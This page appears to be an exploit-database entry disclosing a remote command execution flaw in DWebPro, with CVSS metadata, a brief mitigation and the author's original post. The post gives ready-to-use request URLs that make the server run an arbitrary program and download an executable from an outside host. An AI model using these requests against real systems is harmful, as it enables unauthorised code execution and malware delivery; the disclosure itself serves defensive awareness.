header-logo
Suggest Exploit
vendor:
DWebPro
by:
Rafael Sousa
8.8
CVSS
HIGH
Remote Execution
78
CWE
Product Name: DWebPro
Affected Version From: Last version
Affected Version To: Older versions
Patch Exists: NO
Related CWE: N/A
CPE: dwebpro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

DWebPro Remote Execution Vulnerability

The last version of DWebPro allows an invader to execute any program by entering a URL in the browser. The URL contains the file path of the program to be executed and the parameters to be passed to the program. An attacker can also use the URL to download a file from a remote server.

Mitigation:

The vendor should patch the vulnerability and ensure that the application does not allow remote execution of programs.
Source

Exploit-DB raw data:

The last version of DWebPro allows an invader to execute any program. Just hit this at your browser:

http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt

And the notepad.exe will open a txt file that calls hi at C:\ server's side.

If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe will open a browser at server side and download the file.

It's really dangerous.

I tested this at last version but may work at older versions as well.

Best Regards,

Rafael Sousa

Navigation

Suggest Exploit

Services By CQR